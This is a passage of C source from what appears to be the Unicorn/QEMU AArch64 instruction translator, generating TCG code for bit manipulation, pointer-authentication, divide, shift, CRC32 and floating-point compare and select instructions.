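* (cond ? -1 : 0), which is why the setcond below uses the inverted
* TCG condition and else_inv tacks on a negation.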
*/ tcg_gen_setcond_i64(tcg_ctx, tcg_invert_cond(c.cond), tcg_rd, c.value, zero); if (else_inv) { tcg_gen_neg_i64(tcg_ctx, tcg_rd, tcg_rd); } } else { TCGv_i64 t_true = cpu_reg(s, rn); TCGv_i64 t_false = read_cpu_reg(s, rm, 1); if (else_inv && else_inc) { tcg_gen_neg_i64(tcg_ctx, t_false, t_false); } else if (else_inv) { tcg_gen_not_i64(tcg_ctx, t_false, t_false); } else if (else_inc) { tcg_gen_addi_i64(tcg_ctx, t_false, t_false, 1); } tcg_gen_movcond_i64(tcg_ctx, c.cond, tcg_rd, c.value, zero, t_true, t_false); } tcg_temp_free_i64(tcg_ctx, zero); a64_free_cc(tcg_ctx, &c); if (!sf) { tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rd); } } static void handle_clz(DisasContext *s, unsigned int sf, unsigned int rn, unsigned int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tcg_rd, tcg_rn; tcg_rd = cpu_reg(s, rd); tcg_rn = cpu_reg(s, rn); if (sf) { tcg_gen_clzi_i64(tcg_ctx, tcg_rd, tcg_rn, 64); } else { TCGv_i32 tcg_tmp32 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, tcg_tmp32, tcg_rn); tcg_gen_clzi_i32(tcg_ctx, tcg_tmp32, tcg_tmp32, 32); tcg_gen_extu_i32_i64(tcg_ctx, tcg_rd, tcg_tmp32); tcg_temp_free_i32(tcg_ctx, tcg_tmp32); } } static void handle_cls(DisasContext *s, unsigned int sf, unsigned int rn, unsigned int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tcg_rd, tcg_rn; tcg_rd = cpu_reg(s, rd); tcg_rn = cpu_reg(s, rn); if (sf) { tcg_gen_clrsb_i64(tcg_ctx, tcg_rd, tcg_rn); } else { TCGv_i32 tcg_tmp32 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, tcg_tmp32, tcg_rn); tcg_gen_clrsb_i32(tcg_ctx, tcg_tmp32, tcg_tmp32); tcg_gen_extu_i32_i64(tcg_ctx, tcg_rd, tcg_tmp32); tcg_temp_free_i32(tcg_ctx, tcg_tmp32); } } static void handle_rbit(DisasContext *s, unsigned int sf, unsigned int rn, unsigned int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tcg_rd, tcg_rn; tcg_rd = cpu_reg(s, rd); tcg_rn = cpu_reg(s, rn); if (sf) { gen_helper_rbit64(tcg_ctx, tcg_rd, tcg_rn); } else { TCGv_i32 tcg_tmp32 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, tcg_tmp32, tcg_rn); gen_helper_rbit(tcg_ctx, tcg_tmp32, tcg_tmp32); tcg_gen_extu_i32_i64(tcg_ctx, tcg_rd, tcg_tmp32); tcg_temp_free_i32(tcg_ctx, tcg_tmp32); } } /* REV with sf==1, opcode==3 ("REV64") */ static void handle_rev64(DisasContext *s, unsigned int sf, unsigned int rn, unsigned int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!sf) { unallocated_encoding(s); return; } tcg_gen_bswap64_i64(tcg_ctx, cpu_reg(s, rd), cpu_reg(s, rn)); } /* REV with sf==0, opcode==2 * REV32 (sf==1, opcode==2) */ static void handle_rev32(DisasContext *s, unsigned int sf, unsigned int rn, unsigned int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tcg_rd = cpu_reg(s, rd); if (sf) { TCGv_i64 tcg_tmp = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_rn = read_cpu_reg(s, rn, sf); /* bswap32_i64 requires zero high word */ tcg_gen_ext32u_i64(tcg_ctx, tcg_tmp, tcg_rn); tcg_gen_bswap32_i64(tcg_ctx, tcg_rd, tcg_tmp); tcg_gen_shri_i64(tcg_ctx, tcg_tmp, tcg_rn, 32); tcg_gen_bswap32_i64(tcg_ctx, tcg_tmp, tcg_tmp); tcg_gen_concat32_i64(tcg_ctx, tcg_rd, tcg_rd, tcg_tmp); tcg_temp_free_i64(tcg_ctx, tcg_tmp); } else { tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, cpu_reg(s, rn)); tcg_gen_bswap32_i64(tcg_ctx, tcg_rd, tcg_rd); } } /* REV16 (opcode==1) */ static void handle_rev16(DisasContext *s, unsigned int sf, unsigned int rn, unsigned int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tcg_rd = cpu_reg(s, rd); TCGv_i64 tcg_tmp = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_rn = read_cpu_reg(s, rn, sf); TCGv_i64 mask = tcg_const_i64(tcg_ctx, sf ? 
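/* REV16 swaps the two bytes of each halfword; the mask selects the
 * low byte of every halfword in both the original value and the copy
 * shifted right by 8, and the two halves are recombined below.
 */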
0x00ff00ff00ff00ffull : 0x00ff00ff); tcg_gen_shri_i64(tcg_ctx, tcg_tmp, tcg_rn, 8); tcg_gen_and_i64(tcg_ctx, tcg_rd, tcg_rn, mask); tcg_gen_and_i64(tcg_ctx, tcg_tmp, tcg_tmp, mask); tcg_gen_shli_i64(tcg_ctx, tcg_rd, tcg_rd, 8); tcg_gen_or_i64(tcg_ctx, tcg_rd, tcg_rd, tcg_tmp); tcg_temp_free_i64(tcg_ctx, mask); tcg_temp_free_i64(tcg_ctx, tcg_tmp); } /* Data-processing (1 source) * 31 30 29 28 21 20 16 15 10 9 5 4 0 * +----+---+---+-----------------+---------+--------+------+------+ * | sf | 1 | S | 1 1 0 1 0 1 1 0 | opcode2 | opcode | Rn | Rd | * +----+---+---+-----------------+---------+--------+------+------+ */ static void disas_data_proc_1src(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned int sf, opcode, opcode2, rn, rd; TCGv_i64 tcg_rd; if (extract32(insn, 29, 1)) { unallocated_encoding(s); return; } sf = extract32(insn, 31, 1); opcode = extract32(insn, 10, 6); opcode2 = extract32(insn, 16, 5); rn = extract32(insn, 5, 5); rd = extract32(insn, 0, 5); #define MAP(SF, O2, O1) ((SF) | (O1 << 1) | (O2 << 7)) switch (MAP(sf, opcode2, opcode)) { case MAP(0, 0x00, 0x00): /* RBIT */ case MAP(1, 0x00, 0x00): handle_rbit(s, sf, rn, rd); break; case MAP(0, 0x00, 0x01): /* REV16 */ case MAP(1, 0x00, 0x01): handle_rev16(s, sf, rn, rd); break; case MAP(0, 0x00, 0x02): /* REV/REV32 */ case MAP(1, 0x00, 0x02): handle_rev32(s, sf, rn, rd); break; case MAP(1, 0x00, 0x03): /* REV64 */ handle_rev64(s, sf, rn, rd); break; case MAP(0, 0x00, 0x04): /* CLZ */ case MAP(1, 0x00, 0x04): handle_clz(s, sf, rn, rd); break; case MAP(0, 0x00, 0x05): /* CLS */ case MAP(1, 0x00, 0x05): handle_cls(s, sf, rn, rd); break; case MAP(1, 0x01, 0x00): /* PACIA */ if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_pacia(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd, cpu_reg_sp(s, rn)); } else if (!dc_isar_feature(aa64_pauth, s)) { goto do_unallocated; } break; case MAP(1, 0x01, 0x01): /* PACIB */ if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_pacib(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd, cpu_reg_sp(s, rn)); } else if (!dc_isar_feature(aa64_pauth, s)) { goto do_unallocated; } break; case MAP(1, 0x01, 0x02): /* PACDA */ if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_pacda(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd, cpu_reg_sp(s, rn)); } else if (!dc_isar_feature(aa64_pauth, s)) { goto do_unallocated; } break; case MAP(1, 0x01, 0x03): /* PACDB */ if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_pacdb(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd, cpu_reg_sp(s, rn)); } else if (!dc_isar_feature(aa64_pauth, s)) { goto do_unallocated; } break; case MAP(1, 0x01, 0x04): /* AUTIA */ if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_autia(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd, cpu_reg_sp(s, rn)); } else if (!dc_isar_feature(aa64_pauth, s)) { goto do_unallocated; } break; case MAP(1, 0x01, 0x05): /* AUTIB */ if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_autib(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd, cpu_reg_sp(s, rn)); } else if (!dc_isar_feature(aa64_pauth, s)) { goto do_unallocated; } break; case MAP(1, 0x01, 0x06): /* AUTDA */ if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_autda(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd, cpu_reg_sp(s, rn)); } else if (!dc_isar_feature(aa64_pauth, s)) { goto do_unallocated; } break; case MAP(1, 0x01, 0x07): /* AUTDB */ if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_autdb(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd, cpu_reg_sp(s, rn)); } else if (!dc_isar_feature(aa64_pauth, s)) { goto 
do_unallocated; } break; case MAP(1, 0x01, 0x08): /* PACIZA */ if (!dc_isar_feature(aa64_pauth, s) || rn != 31) { goto do_unallocated; } else if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_pacia(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd, new_tmp_a64_zero(s)); } break; case MAP(1, 0x01, 0x09): /* PACIZB */ if (!dc_isar_feature(aa64_pauth, s) || rn != 31) { goto do_unallocated; } else if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_pacib(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd, new_tmp_a64_zero(s)); } break; case MAP(1, 0x01, 0x0a): /* PACDZA */ if (!dc_isar_feature(aa64_pauth, s) || rn != 31) { goto do_unallocated; } else if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_pacda(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd, new_tmp_a64_zero(s)); } break; case MAP(1, 0x01, 0x0b): /* PACDZB */ if (!dc_isar_feature(aa64_pauth, s) || rn != 31) { goto do_unallocated; } else if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_pacdb(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd, new_tmp_a64_zero(s)); } break; case MAP(1, 0x01, 0x0c): /* AUTIZA */ if (!dc_isar_feature(aa64_pauth, s) || rn != 31) { goto do_unallocated; } else if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_autia(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd, new_tmp_a64_zero(s)); } break; case MAP(1, 0x01, 0x0d): /* AUTIZB */ if (!dc_isar_feature(aa64_pauth, s) || rn != 31) { goto do_unallocated; } else if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_autib(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd, new_tmp_a64_zero(s)); } break; case MAP(1, 0x01, 0x0e): /* AUTDZA */ if (!dc_isar_feature(aa64_pauth, s) || rn != 31) { goto do_unallocated; } else if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_autda(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd, new_tmp_a64_zero(s)); } break; case MAP(1, 0x01, 0x0f): /* AUTDZB */ if (!dc_isar_feature(aa64_pauth, s) || rn != 31) { goto do_unallocated; } else if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_autdb(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd, new_tmp_a64_zero(s)); } break; case MAP(1, 0x01, 0x10): /* XPACI */ if (!dc_isar_feature(aa64_pauth, s) || rn != 31) { goto do_unallocated; } else if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_xpaci(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd); } break; case MAP(1, 0x01, 0x11): /* XPACD */ if (!dc_isar_feature(aa64_pauth, s) || rn != 31) { goto do_unallocated; } else if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_xpacd(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd); } break; default: do_unallocated: unallocated_encoding(s); break; } #undef MAP } static void handle_div(DisasContext *s, bool is_signed, unsigned int sf, unsigned int rm, unsigned int rn, unsigned int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tcg_n, tcg_m, tcg_rd; tcg_rd = cpu_reg(s, rd); if (!sf && is_signed) { tcg_n = new_tmp_a64(s); tcg_m = new_tmp_a64(s); tcg_gen_ext32s_i64(tcg_ctx, tcg_n, cpu_reg(s, rn)); tcg_gen_ext32s_i64(tcg_ctx, tcg_m, cpu_reg(s, rm)); } else { tcg_n = read_cpu_reg(s, rn, sf); tcg_m = read_cpu_reg(s, rm, sf); } if (is_signed) { gen_helper_sdiv64(tcg_ctx, tcg_rd, tcg_n, tcg_m); } else { gen_helper_udiv64(tcg_ctx, tcg_rd, tcg_n, tcg_m); } if (!sf) { /* zero extend final result */ tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rd); } } /* LSLV, LSRV, ASRV, RORV */ static void handle_shift_reg(DisasContext *s, enum a64_shift_type shift_type, unsigned int sf, unsigned int rm, unsigned int rn, unsigned int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tcg_shift = 
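/* The architecture defines the variable shift amount as Rm modulo the
 * data size, so the masking with 63 (or 31) below both implements that
 * and keeps the TCG shift amount in range.
 */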
tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_rd = cpu_reg(s, rd); TCGv_i64 tcg_rn = read_cpu_reg(s, rn, sf); tcg_gen_andi_i64(tcg_ctx, tcg_shift, cpu_reg(s, rm), sf ? 63 : 31); shift_reg(tcg_ctx, tcg_rd, tcg_rn, sf, shift_type, tcg_shift); tcg_temp_free_i64(tcg_ctx, tcg_shift); } /* CRC32[BHWX], CRC32C[BHWX] */ static void handle_crc32(DisasContext *s, unsigned int sf, unsigned int sz, bool crc32c, unsigned int rm, unsigned int rn, unsigned int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tcg_acc, tcg_val; TCGv_i32 tcg_bytes; if (!dc_isar_feature(aa64_crc32, s) || (sf == 1 && sz != 3) || (sf == 0 && sz == 3)) { unallocated_encoding(s); return; } if (sz == 3) { tcg_val = cpu_reg(s, rm); } else { uint64_t mask; switch (sz) { case 0: mask = 0xFF; break; case 1: mask = 0xFFFF; break; case 2: mask = 0xFFFFFFFF; break; default: g_assert_not_reached(); } tcg_val = new_tmp_a64(s); tcg_gen_andi_i64(tcg_ctx, tcg_val, cpu_reg(s, rm), mask); } tcg_acc = cpu_reg(s, rn); tcg_bytes = tcg_const_i32(tcg_ctx, 1 << sz); if (crc32c) { gen_helper_crc32c_64(tcg_ctx, cpu_reg(s, rd), tcg_acc, tcg_val, tcg_bytes); } else { gen_helper_crc32_64(tcg_ctx, cpu_reg(s, rd), tcg_acc, tcg_val, tcg_bytes); } tcg_temp_free_i32(tcg_ctx, tcg_bytes); } /* Data-processing (2 source) * 31 30 29 28 21 20 16 15 10 9 5 4 0 * +----+---+---+-----------------+------+--------+------+------+ * | sf | 0 | S | 1 1 0 1 0 1 1 0 | Rm | opcode | Rn | Rd | * +----+---+---+-----------------+------+--------+------+------+ */ static void disas_data_proc_2src(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned int sf, rm, opcode, rn, rd; sf = extract32(insn, 31, 1); rm = extract32(insn, 16, 5); opcode = extract32(insn, 10, 6); rn = extract32(insn, 5, 5); rd = extract32(insn, 0, 5); if (extract32(insn, 29, 1)) { unallocated_encoding(s); return; } switch (opcode) { case 2: /* UDIV */ handle_div(s, false, sf, rm, rn, rd); break; case 3: /* SDIV */ handle_div(s, true, sf, rm, rn, rd); break; case 8: /* LSLV */ handle_shift_reg(s, A64_SHIFT_TYPE_LSL, sf, rm, rn, rd); break; case 9: /* LSRV */ handle_shift_reg(s, A64_SHIFT_TYPE_LSR, sf, rm, rn, rd); break; case 10: /* ASRV */ handle_shift_reg(s, A64_SHIFT_TYPE_ASR, sf, rm, rn, rd); break; case 11: /* RORV */ handle_shift_reg(s, A64_SHIFT_TYPE_ROR, sf, rm, rn, rd); break; case 12: /* PACGA */ if (sf == 0 || !dc_isar_feature(aa64_pauth, s)) { goto do_unallocated; } gen_helper_pacga(tcg_ctx, cpu_reg(s, rd), tcg_ctx->cpu_env, cpu_reg(s, rn), cpu_reg_sp(s, rm)); break; case 16: case 17: case 18: case 19: case 20: case 21: case 22: case 23: /* CRC32 */ { int sz = extract32(opcode, 0, 2); bool crc32c = extract32(opcode, 2, 1); handle_crc32(s, sf, sz, crc32c, rm, rn, rd); break; } default: do_unallocated: unallocated_encoding(s); break; } } /* * Data processing - register * 31 30 29 28 25 21 20 16 10 0 * +--+---+--+---+-------+-----+-------+-------+---------+ * | |op0| |op1| 1 0 1 | op2 | | op3 | | * +--+---+--+---+-------+-----+-------+-------+---------+ */ static void disas_data_proc_reg(DisasContext *s, uint32_t insn) { int op0 = extract32(insn, 30, 1); int op1 = extract32(insn, 28, 1); int op2 = extract32(insn, 21, 4); int op3 = extract32(insn, 10, 6); if (!op1) { if (op2 & 8) { if (op2 & 1) { /* Add/sub (extended register) */ disas_add_sub_ext_reg(s, insn); } else { /* Add/sub (shifted register) */ disas_add_sub_reg(s, insn); } } else { /* Logical (shifted register) */ disas_logic_reg(s, insn); } return; } switch (op2) { case 0x0: switch (op3) { case 0x00: /* Add/subtract 
(with carry) */ disas_adc_sbc(s, insn); break; case 0x01: /* Rotate right into flags */ case 0x21: disas_rotate_right_into_flags(s, insn); break; case 0x02: /* Evaluate into flags */ case 0x12: case 0x22: case 0x32: disas_evaluate_into_flags(s, insn); break; default: goto do_unallocated; } break; case 0x2: /* Conditional compare */ disas_cc(s, insn); /* both imm and reg forms */ break; case 0x4: /* Conditional select */ disas_cond_select(s, insn); break; case 0x6: /* Data-processing */ if (op0) { /* (1 source) */ disas_data_proc_1src(s, insn); } else { /* (2 source) */ disas_data_proc_2src(s, insn); } break; case 0x8: /* (3 source) */ case 0x9: /* (3 source) */ case 0xa: /* (3 source) */ case 0xb: /* (3 source) */ case 0xc: /* (3 source) */ case 0xd: /* (3 source) */ case 0xe: /* (3 source) */ case 0xf: /* (3 source) */ disas_data_proc_3src(s, insn); break; default: do_unallocated: unallocated_encoding(s); break; } } static void handle_fp_compare(DisasContext *s, int size, unsigned int rn, unsigned int rm, bool cmp_with_zero, bool signal_all_nans) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tcg_flags = tcg_temp_new_i64(tcg_ctx); TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx, size == MO_16); if (size == MO_64) { TCGv_i64 tcg_vn, tcg_vm; tcg_vn = read_fp_dreg(s, rn); if (cmp_with_zero) { tcg_vm = tcg_const_i64(tcg_ctx, 0); } else { tcg_vm = read_fp_dreg(s, rm); } if (signal_all_nans) { gen_helper_vfp_cmped_a64(tcg_ctx, tcg_flags, tcg_vn, tcg_vm, fpst); } else { gen_helper_vfp_cmpd_a64(tcg_ctx, tcg_flags, tcg_vn, tcg_vm, fpst); } tcg_temp_free_i64(tcg_ctx, tcg_vn); tcg_temp_free_i64(tcg_ctx, tcg_vm); } else { TCGv_i32 tcg_vn = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_vm = tcg_temp_new_i32(tcg_ctx); read_vec_element_i32(s, tcg_vn, rn, 0, size); if (cmp_with_zero) { tcg_gen_movi_i32(tcg_ctx, tcg_vm, 0); } else { read_vec_element_i32(s, tcg_vm, rm, 0, size); } switch (size) { case MO_32: if (signal_all_nans) { gen_helper_vfp_cmpes_a64(tcg_ctx, tcg_flags, tcg_vn, tcg_vm, fpst); } else { gen_helper_vfp_cmps_a64(tcg_ctx, tcg_flags, tcg_vn, tcg_vm, fpst); } break; case MO_16: if (signal_all_nans) { gen_helper_vfp_cmpeh_a64(tcg_ctx, tcg_flags, tcg_vn, tcg_vm, fpst); } else { gen_helper_vfp_cmph_a64(tcg_ctx, tcg_flags, tcg_vn, tcg_vm, fpst); } break; default: g_assert_not_reached(); } tcg_temp_free_i32(tcg_ctx, tcg_vn); tcg_temp_free_i32(tcg_ctx, tcg_vm); } tcg_temp_free_ptr(tcg_ctx, fpst); gen_set_nzcv(tcg_ctx, tcg_flags); tcg_temp_free_i64(tcg_ctx, tcg_flags); } /* Floating point compare * 31 30 29 28 24 23 22 21 20 16 15 14 13 10 9 5 4 0 * +---+---+---+-----------+------+---+------+-----+---------+------+-------+ * | M | 0 | S | 1 1 1 1 0 | type | 1 | Rm | op | 1 0 0 0 | Rn | op2 | * +---+---+---+-----------+------+---+------+-----+---------+------+-------+ */ static void disas_fp_compare(DisasContext *s, uint32_t insn) { unsigned int mos, type, rm, op, rn, opc, op2r; int size; mos = extract32(insn, 29, 3); type = extract32(insn, 22, 2); rm = extract32(insn, 16, 5); op = extract32(insn, 14, 2); rn = extract32(insn, 5, 5); opc = extract32(insn, 3, 2); op2r = extract32(insn, 0, 3); if (mos || op || op2r) { unallocated_encoding(s); return; } switch (type) { case 0: size = MO_32; break; case 1: size = MO_64; break; case 3: size = MO_16; if (dc_isar_feature(aa64_fp16, s)) { break; } /* fallthru */ default: unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_fp_compare(s, size, rn, rm, opc & 1, opc & 2); } /* Floating point conditional compare * 31 30 29 28 24 23 22 21 20 16 15 
12 11 10 9 5 4 3 0 * +---+---+---+-----------+------+---+------+------+-----+------+----+------+ * | M | 0 | S | 1 1 1 1 0 | type | 1 | Rm | cond | 0 1 | Rn | op | nzcv | * +---+---+---+-----------+------+---+------+------+-----+------+----+------+ */ static void disas_fp_ccomp(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned int mos, type, rm, cond, rn, op, nzcv; TCGv_i64 tcg_flags; TCGLabel *label_continue = NULL; int size; mos = extract32(insn, 29, 3); type = extract32(insn, 22, 2); rm = extract32(insn, 16, 5); cond = extract32(insn, 12, 4); rn = extract32(insn, 5, 5); op = extract32(insn, 4, 1); nzcv = extract32(insn, 0, 4); if (mos) { unallocated_encoding(s); return; } switch (type) { case 0: size = MO_32; break; case 1: size = MO_64; break; case 3: size = MO_16; if (dc_isar_feature(aa64_fp16, s)) { break; } /* fallthru */ default: unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } if (cond < 0x0e) { /* not always */ TCGLabel *label_match = gen_new_label(tcg_ctx); label_continue = gen_new_label(tcg_ctx); arm_gen_test_cc(tcg_ctx, cond, label_match); /* nomatch: */ tcg_flags = tcg_const_i64(tcg_ctx, nzcv << 28); gen_set_nzcv(tcg_ctx, tcg_flags); tcg_temp_free_i64(tcg_ctx, tcg_flags); tcg_gen_br(tcg_ctx, label_continue); gen_set_label(tcg_ctx, label_match); } handle_fp_compare(s, size, rn, rm, false, op); if (cond < 0x0e) { gen_set_label(tcg_ctx, label_continue); } } /* Floating point conditional select * 31 30 29 28 24 23 22 21 20 16 15 12 11 10 9 5 4 0 * +---+---+---+-----------+------+---+------+------+-----+------+------+ * | M | 0 | S | 1 1 1 1 0 | type | 1 | Rm | cond | 1 1 | Rn | Rd | * +---+---+---+-----------+------+---+------+------+-----+------+------+ */ static void disas_fp_csel(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned int mos, type, rm, cond, rn, rd; TCGv_i64 t_true, t_false, t_zero; DisasCompare64 c; MemOp sz; mos = extract32(insn, 29, 3); type = extract32(insn, 22, 2); rm = extract32(insn, 16, 5); cond = extract32(insn, 12, 4); rn = extract32(insn, 5, 5); rd = extract32(insn, 0, 5); if (mos) { unallocated_encoding(s); return; } switch (type) { case 0: sz = MO_32; break; case 1: sz = MO_64; break; case 3: sz = MO_16; if (dc_isar_feature(aa64_fp16, s)) { break; } /* fallthru */ default: unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } /* Zero extend sreg & hreg inputs to 64 bits now. */ t_true = tcg_temp_new_i64(tcg_ctx); t_false = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, t_true, rn, 0, sz); read_vec_element(s, t_false, rm, 0, sz); a64_test_cc(tcg_ctx, &c, cond); t_zero = tcg_const_i64(tcg_ctx, 0); tcg_gen_movcond_i64(tcg_ctx, c.cond, t_true, c.value, t_zero, t_true, t_false); tcg_temp_free_i64(tcg_ctx, t_zero); tcg_temp_free_i64(tcg_ctx, t_false); a64_free_cc(tcg_ctx, &c); /* Note that sregs & hregs write back zeros to the high bits, and we've already done the zero-extension. 
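* A single 64-bit write via write_fp_dreg therefore serves all three
* element sizes.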
*/ write_fp_dreg(s, rd, t_true); tcg_temp_free_i64(tcg_ctx, t_true); } /* Floating-point data-processing (1 source) - half precision */ static void handle_fp_1src_half(DisasContext *s, int opcode, int rd, int rn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr fpst = NULL; TCGv_i32 tcg_op = read_fp_hreg(s, rn); TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); switch (opcode) { case 0x0: /* FMOV */ tcg_gen_mov_i32(tcg_ctx, tcg_res, tcg_op); break; case 0x1: /* FABS */ tcg_gen_andi_i32(tcg_ctx, tcg_res, tcg_op, 0x7fff); break; case 0x2: /* FNEG */ tcg_gen_xori_i32(tcg_ctx, tcg_res, tcg_op, 0x8000); break; case 0x3: /* FSQRT */ fpst = get_fpstatus_ptr(tcg_ctx, true); gen_helper_sqrt_f16(tcg_ctx, tcg_res, tcg_op, fpst); break; case 0x8: /* FRINTN */ case 0x9: /* FRINTP */ case 0xa: /* FRINTM */ case 0xb: /* FRINTZ */ case 0xc: /* FRINTA */ { TCGv_i32 tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(opcode & 7)); fpst = get_fpstatus_ptr(tcg_ctx, true); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, fpst); gen_helper_advsimd_rinth(tcg_ctx, tcg_res, tcg_op, fpst); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, fpst); tcg_temp_free_i32(tcg_ctx, tcg_rmode); break; } case 0xe: /* FRINTX */ fpst = get_fpstatus_ptr(tcg_ctx, true); gen_helper_advsimd_rinth_exact(tcg_ctx, tcg_res, tcg_op, fpst); break; case 0xf: /* FRINTI */ fpst = get_fpstatus_ptr(tcg_ctx, true); gen_helper_advsimd_rinth(tcg_ctx, tcg_res, tcg_op, fpst); break; default: abort(); } write_fp_sreg(s, rd, tcg_res); if (fpst) { tcg_temp_free_ptr(tcg_ctx, fpst); } tcg_temp_free_i32(tcg_ctx, tcg_op); tcg_temp_free_i32(tcg_ctx, tcg_res); } /* Floating-point data-processing (1 source) - single precision */ static void handle_fp_1src_single(DisasContext *s, int opcode, int rd, int rn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; void (*gen_fpst)(TCGContext *, TCGv_i32, TCGv_i32, TCGv_ptr) = NULL; TCGv_i32 tcg_op, tcg_res; TCGv_ptr fpst; int rmode = -1; tcg_op = read_fp_sreg(s, rn); tcg_res = tcg_temp_new_i32(tcg_ctx); switch (opcode) { case 0x0: /* FMOV */ tcg_gen_mov_i32(tcg_ctx, tcg_res, tcg_op); goto done; case 0x1: /* FABS */ gen_helper_vfp_abss(tcg_ctx, tcg_res, tcg_op); goto done; case 0x2: /* FNEG */ gen_helper_vfp_negs(tcg_ctx, tcg_res, tcg_op); goto done; case 0x3: /* FSQRT */ gen_helper_vfp_sqrts(tcg_ctx, tcg_res, tcg_op, tcg_ctx->cpu_env); goto done; case 0x8: /* FRINTN */ case 0x9: /* FRINTP */ case 0xa: /* FRINTM */ case 0xb: /* FRINTZ */ case 0xc: /* FRINTA */ rmode = arm_rmode_to_sf(opcode & 7); gen_fpst = gen_helper_rints; break; case 0xe: /* FRINTX */ gen_fpst = gen_helper_rints_exact; break; case 0xf: /* FRINTI */ gen_fpst = gen_helper_rints; break; case 0x10: /* FRINT32Z */ rmode = float_round_to_zero; gen_fpst = gen_helper_frint32_s; break; case 0x11: /* FRINT32X */ gen_fpst = gen_helper_frint32_s; break; case 0x12: /* FRINT64Z */ rmode = float_round_to_zero; gen_fpst = gen_helper_frint64_s; break; case 0x13: /* FRINT64X */ gen_fpst = gen_helper_frint64_s; break; default: g_assert_not_reached(); } fpst = get_fpstatus_ptr(tcg_ctx, false); if (rmode >= 0) { TCGv_i32 tcg_rmode = tcg_const_i32(tcg_ctx, rmode); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, fpst); gen_fpst(tcg_ctx, tcg_res, tcg_op, fpst); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, fpst); tcg_temp_free_i32(tcg_ctx, tcg_rmode); } else { gen_fpst(tcg_ctx, tcg_res, tcg_op, fpst); } tcg_temp_free_ptr(tcg_ctx, fpst); done: write_fp_sreg(s, rd, tcg_res); tcg_temp_free_i32(tcg_ctx, tcg_op); tcg_temp_free_i32(tcg_ctx, tcg_res); } /* Floating-point 
